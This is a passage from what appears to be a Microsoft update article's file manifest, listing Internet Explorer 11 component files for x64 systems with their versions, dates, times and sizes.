541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:31| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:29| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 20:28| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:17| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \n \n## \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:25| 2,882,048 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 21:22| 108,544 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 19:18| 65,024 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 1,569,280 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 23:30| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 21:51| 43,008 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:35| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:01| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:20| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:00| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:59| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:58| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 16:02| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 15:57| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:39| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:38| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:37| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:27| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:34| 31,232 \nhtml.iec| 2019.0.0.19301| 25-Feb-2019| 23:31| 417,280 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:26| 2,132,992 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:33| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:18| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:15| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:26| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 10-Jul-2019| 0:25| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:12| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:13| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:06| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:04| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:16| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 22:17| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:01| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 18:15| 4,859,904 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 21:59| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 5:38| 615,936 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:28| 381,952 \ninstall.ins| Not versioned| 12-Feb-2021| 16:26| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 1,422,848 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:42| 92,672 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 25,762,816 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 21:24| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:30| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 19:17| 2,915,840 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 22:04| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 